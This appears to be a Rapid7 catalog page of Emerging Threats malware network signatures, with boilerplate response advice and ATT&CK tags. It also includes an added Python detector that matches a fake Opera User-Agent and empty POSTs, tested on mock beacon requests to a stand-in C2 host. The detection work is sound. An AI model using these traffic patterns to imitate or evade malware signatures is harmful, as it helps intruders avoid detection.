This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Reimageplus Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Remcos Builder License Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Remote Desktop Spy Install Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Request for Malicious .dat File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Request for utu.dat Likely Ponmocup checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rerdom/Asprox CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Revcode RAT CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Revcode RAT CnC 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRat 2.0 CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ReverseRAT Activity (POST) M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Revoyem Ransomware Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Revoyem Ransomware Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE RezoStealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rhabdo CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RHttpCtrl Backdoor CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RocketKitten APT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RocketMan Win32/Drun

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue AV Downloader concat URI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/FakePAV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/Winwebsec Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rogue.Win32/Winwebsec Install 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rootkit TDSS/Alureon Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rostpay Downloader User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Rouge Security Software Win32.BHO.egw

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE RustyBuer CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE S400 RAT Client Checkin via Discord

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SA Banker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SAD Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Sage Ransomware Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Sage Ransomware Checkin Primer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Saint Bot CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Saker UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sakula/Mivast C2 Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sakula/Mivast RAT CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sakula/Mivast RAT CnC Beacon 7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sality - Fake Opera User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality - Fake Opera User-Agent (Opera/8.89)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality Variant Downloader Activity (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sality Variant Downloader Activity (3)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (download)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (powershell)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (rdp)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Command (update)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (cmd_exec)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (download_exec)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (powershell_exec)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (rdp_exec)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sarwent CnC Response (update_exec)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sasfis Botnet Client Reporting Back to Controller After Command Execution

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Satan/5ss5c Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Scanbox Sending Host Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SEASALT HTTP Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Secure-Soft.Stealer Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sednit/APT28/Sofacy Delphocy CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sednit/AZZY Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sednit Connectivity Check 0 Byte POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.
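
The Sality fake-Opera rules above (including the one that names the Opera/8.89 string) and this Sednit 0-byte POST rule all key on the HTTP request head rather than on a payload. As an added example of that class of detection, not code from Rapid7 or from the Emerging Threats ruleset, the Python below parses raw request heads, evaluates two conditions read off the rule names, and returns the source, host and URI an analyst reviewing the alert would look at first. The sample requests, the hosts and addresses in them, and the reading of "0 Byte POST" as a POST carrying Content-Length: 0 are assumptions for the example; the real signatures carry further constraints that are not reproduced here.

```python
# Added example: a minimal HTTP request-head matcher in the spirit of the
# User-Agent and 0-byte-POST rules listed on this page. It is not Rapid7's or
# Emerging Threats' code; the match conditions are read off the rule names
# and omit the extra constraints the real signatures carry.


def parse_request_head(raw: bytes):
    """Parse the request line and headers of an HTTP/1.x request head.
    Header names are lower-cased so 'user-agent' and 'User-Agent' match.
    Returns None when the head is not well-formed."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "uri": parts[1], "headers": headers}


def ua_prefix(prefix: str):
    """Condition: the User-Agent header starts with the given string."""
    return lambda req: req["headers"].get("user-agent", "").startswith(prefix)


def zero_byte_post(req) -> bool:
    """Condition: a POST that declares an empty body. This is an assumed
    reading of '0 Byte POST'; the real rule is narrower than this."""
    return req["method"] == "POST" and req["headers"].get("content-length") == "0"


# Rule table: (alert message, condition). The Opera/8.89 string comes from
# the rule name on this page; everything else here is constructed.
RULES = [
    ("ET MALWARE Sality - Fake Opera User-Agent (Opera/8.89)", ua_prefix("Opera/8.89")),
    ("ET MALWARE Sednit Connectivity Check 0 Byte POST", zero_byte_post),
]

# Constructed sample traffic: (source IP, raw request head). Not real captures.
SAMPLE_REQUESTS = [
    ("10.0.0.15", b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\r\n"),
    ("10.0.0.23", b"GET /check.php?id=1 HTTP/1.1\r\nHost: c2.example.invalid\r\n"
                  b"user-agent: Opera/8.89\r\nConnection: close\r\n\r\n"),
    ("10.0.0.42", b"POST /up HTTP/1.1\r\nHost: c2.example.invalid\r\n"
                  b"User-Agent: Mozilla/4.0\r\nContent-Length: 0\r\n\r\n"),
    ("10.0.0.99", b"not http at all\r\n\r\n"),
]


def run_rules(requests, rules=RULES):
    """Evaluate every rule against every parseable request. Returns alert
    dicts carrying the fields an analyst needs first (source, host, URI)."""
    alerts = []
    for src, raw in requests:
        req = parse_request_head(raw)
        if req is None:
            continue          # malformed head: nothing for an HTTP rule to match
        for msg, cond in rules:
            if cond(req):
                alerts.append({"rule": msg, "src": src,
                               "host": req["headers"].get("host", ""),
                               "method": req["method"], "uri": req["uri"]})
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_REQUESTS):
        print(f'{alert["src"]} -> {alert["host"]}{alert["uri"]}: {alert["rule"]}')
```

Header names are lower-cased before lookup because `user-agent: Opera/8.89` and `User-Agent: Opera/8.89` are the same header to a client and must be to a detector. Taken alone, the 0-byte POST condition would be noisy (browsers and updaters send empty POSTs too); in the real rule it is one constraint among several, which is why the Recommendation to review the alert in context stands.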

ET MALWARE Sefnit Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sekhmet Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Self-Signed Cert Observed in Various Zbot Strains

Description

Recommendation

ET MALWARE Send-Safe Bulk Mailer SSL Cert - Observed in Spam Campaigns

Description

Recommendation

ET MALWARE SepSys/SepSystem Ransomware Style External IP Address Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE SERVER SSL Cert APT1

Description

Recommendation

ET MALWARE ServHelper CnC Command (Net User)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Command (Reg Add)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Command (Whoami)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper CnC Inital Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ServHelper RAT CnC Domain Observed in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SFG Client Information POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shafttt MySQL Bruteforce Bot CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Shamoon V3 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke CnC Beacon 10

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 11

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 12

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke CnC Beacon 9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Sharik/Smoke Fake 404 Response with Payload Location

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity Check 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Adobe Connectivity Check 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Java Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Microsoft Connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Microsoft Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Sharik/Smoke Loader Receiving Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SharpPanda APT Downloader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SharpPanda APT Maldoc Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shifr Ransomware Malicious Domain in SNI Observed

Description

Recommendation

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ShivaGood Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Shiz or Rohimafo Reporting Listening Socket to CnC Server

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shiz/Rohimafo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SHLAYER CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Shylock Module Data POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Beacon)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE SiameseKitten/Lyceum/Hexane MSIL/Shark CnC Activity (Download)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

